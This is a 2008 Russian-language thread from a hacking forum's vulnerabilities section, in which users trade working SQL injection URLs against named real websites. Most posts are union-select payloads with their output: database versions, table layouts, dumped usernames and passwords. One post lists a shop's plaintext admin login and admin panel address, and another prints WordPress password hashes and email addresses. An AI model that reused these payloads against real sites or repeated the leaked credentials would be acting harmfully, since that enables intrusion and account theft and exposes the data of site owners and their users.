ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.11.2008, 21:58
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Инъекция:
Цитата:
http://www.srpska.ru/article.php?nid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Инфо:
Цитата:
Database Version: 5.0.60
Database name: db_ansimov_7
User name: dbu_ansimov_1@localhost
Структура:
Код:
categories:
   u_id
   cat_id
   cat_name
   cat_parent
   cat_descr

comm_members_list:
   comm_id
   u_id
   u_status
   comm_name

comments:
   comm_id
   comm_parent_id
   comm_parent_type
   comm_date
   comm_header
   comm_content
   comm_autor


Инъекция:
Цитата:
http://zvisti.com.ua/info.php?id=-1+union+select+1,2,3,4,5,666,7,8,9,10,11,12--
Инфо:
Цитата:
Database Version: 5.0.45
Database name: zvisti_db
User name: zvisti_user@localhost
Структуру лень раскрывать было...




Инъекция:
Цитата:
http://www.anshlagm.ru/a-info.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20--
Инфо:
Цитата:
Database Version: 4.1.22-log
Database name: melbis
User name: melbis@10.0.1.201

Последний раз редактировалось ChaaK; 18.11.2008 в 22:52..
 

  #2  
Старый 18.11.2008, 22:10
Neoveneficus
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
Провел на форуме:
1199829

Репутация: 405
Отправить сообщение для Neoveneficus с помощью ICQ
По умолчанию

Код:
http://www.s7tour.ru/hotel.php?country=-1+union+select+1,version()/*

*** SQLBruter's report [ Tuesday 18th 0f November 2008 08:55:02 PM ] ***

[~] Names of tables bruteforce

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM hotel/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM news/*

http://www.s7tour.ru/hotel.php?country=-1 UNION SELECT 0,0 FROM poll_user/*
 

  #3  
Старый 18.11.2008, 22:42
foopi
Познающий
Регистрация: 26.10.2008
Сообщений: 50
Провел на форуме:
536527

Репутация: 62
Отправить сообщение для foopi с помощью ICQ
По умолчанию

http://www.s7tour.ru/hotel.php?country=-1+UNION+SELECT+1,concat_ws(0x3a,username,userpass) +FROM+poll_user/*
 

  #4  
Старый 19.11.2008, 02:41
plutus
Новичок
Регистрация: 03.11.2008
Сообщений: 25
Провел на форуме:
34070

Репутация: 20
По умолчанию

http://irannag hme.com/viewalbums.php?artistId=-1+UNION%20SELECT%201,concat_ws(0x3a3a,username,pas sword),3,4,5,6,7,8,9,10+from+users--

http://mp3hunga ma.com/music/viewalbums.php?artistId=-5+UNION%20SELECT%201,concat_ws(0x3a3a,username,pas sword,email),3,4,5,6,7,8,9,10+from+users--
 

  #5  
Старый 19.11.2008, 11:02
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

https://www.keeperstop.com/pages.php?id=7+union+select+1,2,3,version(),5,6,7/*

5.0.44-log

Таблица registrations
 

  #6  
Старый 19.11.2008, 12:41
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

http://www.chicgemsetc.com/press_article.php?id=-21+union+select+1,2,3,4,5,version(),7,8,9--

5.0.67-log

Ювелирка вроде.
 

  #7  
Старый 19.11.2008, 19:06
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Инъекция:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
Код:
DB Version - 5.0.51a-log
DB User    - charity_charity@localhost
DB Name    - charity_charity
Таблицы:
Цитата:
beg_begs
beg_categories
beg_manager
beg_scam
beg_unwelcome
beg_users
categories
games
ratings
Таблица beg_users:
Цитата:
ID
beg_id
ip
Таблица beg_manager:
Цитата:
id
name
passwd
Таблица beg_unwelcome:
Цитата:
ID
email

Только что-то пароли не подходят

Email:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,email,4,5,6,7,8,9,10,11,12,13+f rom+beg_unwelcome--
Пароль:
Цитата:
http://www.digitalcharity.com/m.php?id=-1+union+select+1,2,passwd,4,5,6,7,8,9,10,11,12,13+ from+beg_manager--
 

  #8  
Старый 19.11.2008, 19:59
peonix
Познающий
Регистрация: 09.11.2008
Сообщений: 34
Провел на форуме:
36308

Репутация: 2
По умолчанию

http://www.a-shop.ru/product_info.php?products_id=-1'+union+select+concat(username,char(58),password) +from+administrators/*

http://www.a-shop.ru/admin
bigmike : bigdent
 

  #9  
Старый 20.11.2008, 02:14
ThreeD
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678

Репутация: 354
По умолчанию

Ещё одна ювелирка вроде.

http://www.atlasjewellery.com/enquiry.php?id=-147+union+select+1,2,3,4,5,6,version()/*

5.0.41-community-log

Последний раз редактировалось Constantine; 26.11.2008 в 19:34..
 

  #10  
Старый 20.11.2008, 03:02
Sindicat
Новичок
Регистрация: 14.11.2008
Сообщений: 12
Провел на форуме:
42624

Репутация: 10
По умолчанию

Красивый сайт нет слов ))

http://lineage2-rmt.com/news.php?id=-25+union+select+1,concat_ws(0x3a,table_schema,tabl e_name),3,4+from+information_schema.tables+limit+3 51,1--


http://lineage2-rmt.com/news.php?id=-25+union+select+1,concat(user_login,0x3a,user_pass ,char(32,32),user_nicename,char(32,32),user_email) ,3,4+from+asandcom_wordpress.wp_users+limit+1,1--

admin:$P$BkKicvsTytFhHOXTNGhYXCg25CvccO. admin zg@a-sand.com

zg:$P$BuYAHnmiu7Hx2ULVXEx1mMR8IyaSav/ zg zg@a-sand.com
 
 





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ